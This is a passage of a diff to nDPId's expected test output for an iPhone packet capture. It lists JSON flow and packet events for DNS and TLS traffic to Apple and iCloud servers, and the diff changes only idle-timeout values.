190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=keyvalueservice.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D8:84:3B:15:06:49:1C:72:C4:05:C0:F0:82:3B:43:4A:D1:8F:D5:9F"}} 
00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1582454599054,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1582454599054,"pkt":"AQBeAAAWxGGLNYKpCABGAAAoAABAAAECQgDAqAIR4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7"} 00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
@@ -215,82 +215,82 @@ 00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599065,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1582454599105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"thread_ts_msec":1582454599105,"pkt":"xGGLNYKpxiwDYGpkCABFAABx6W4AAEARC6vAqAIBwKgCEQA1yz8AXf6hdCWBgAABAAIAAAAAA2dzYQVhcHBsZQNjb20AAAEAAcAMAAUAAQAAEZYAGgNnc2EFYXBwbGUDY29tBmFrYWRucwNuZXQAwCsAAQABAAAA4QAEEYmmIw=="} 00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599225,"flow_last_seen":1582454599225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599225,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1582454599225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599225,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WYAbuypew6AAAAALDC\/\/9PDwAAAgQFtAEDAwcBAQgKEd\/qGwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1582454599259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599259,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZj0WnUXsqXsO6BScSAj8wAAAgQFrAEBCApbEwn1Ed\/qGwEDAwU="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1582454599261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599261,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WYAbuypew79Fp1GIAQBAu8hwAAAQEIChHf6p1bEwn1"} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599225,"flow_last_seen":1582454599261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599261,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":270,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599225,"flow_last_seen":1582454599295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599295,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":272,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599225,"flow_last_seen":1582454599297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599297,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599396,"flow_last_seen":1582454599396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599396,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1582454599396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599396,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGwFLAqAIREYmmI8WZAbu9h96xAAAAALDC\/\/9bXgAAAgQFtAEDAwcBAQgKEd\/rCQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599225,"flow_last_seen":1582454599225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599225,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1582454599225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599225,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WYAbuypew6AAAAALDC\/\/9PDwAAAgQFtAEDAwcBAQgKEd\/qGwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1582454599259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599259,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZj0WnUXsqXsO6BScSAj8wAAAgQFrAEBCApbEwn1Ed\/qGwEDAwU="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1582454599261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599261,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WYAbuypew79Fp1GIAQBAu8hwAAAQEIChHf6p1bEwn1"} 
+00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599225,"flow_last_seen":1582454599261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599261,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":270,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599225,"flow_last_seen":1582454599295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599295,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":272,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599225,"flow_last_seen":1582454599297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599297,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599396,"flow_last_seen":1582454599396,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599396,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1582454599396,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599396,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGwFLAqAIREYmmI8WZAbu9h96xAAAAALDC\/\/9bXgAAAgQFtAEDAwcBAQgKEd\/rCQAAAAAEAgAA"} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1582454599396,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1582454599396,"pkt":"AQBeAAD7xGGLNYKpCABFAABeopUAAP8RdUTAqAIR4AAA+xTpFOkASvALAAAAAAABAAAAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAwAAQAAKQWgAAARlAASAAQADgAA5mGLNYKpxGGLNYKp"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1582454599568,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1582454599568,"pkt":"MzMAAAACxGGLNYKpht1gCzl3ABA6\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAAChQA9fgAAAAABAcRhizWCqQ=="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1582454599585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599585,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAACsGFVcRiaYjwKgCEQG7xZn\/hRwvvYfesqBS\/\/9NtwAAAgQFrAQCCArKEDlZEd\/rCQEDAws="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1582454599602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599602,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGwF7AqAIREYmmI8WZAbu9h96y\/4UcMIAQBAt3qQAAAQEIChHf7BTKEDlZ"} -00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599396,"flow_last_seen":1582454599603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599740,"flow_last_seen":1582454599740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599740,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454599740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599740,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WaAbsCzUbDAAAAALDC\/\/+ibQAAAgQFtAEDAwcBAQgKEd\/sCwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454599774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599774,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC0GCMAR+LBLwKgCEQG7xZq3FAeKAs1GxKBScSAgIAAAAgQFrAEBCApbEwv6Ed\/sCwEDAwU="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454599776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WaAbsCzUbEtxQHi4AQBAu4qgAAAQEIChHf7JdbEwv6"} 
-00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599740,"flow_last_seen":1582454599776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":325,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599396,"flow_last_seen":1582454599793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599793,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01232{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599396,"flow_last_seen":1582454599794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4308,"flow_avg_l4_payload_len":538,"midstream":0,"thread_ts_msec":1582454599794,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","server_names":"gsas.apple.com,gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gsa.apple.com, O=Apple Inc., ST=California, C=US","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D4:EF:5E:AD:7F:D5:13:5B:9F:B2:B9:84:19:75:BB:ED:53:FB:18:D6"}} -00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599740,"flow_last_seen":1582454599811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599811,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": 
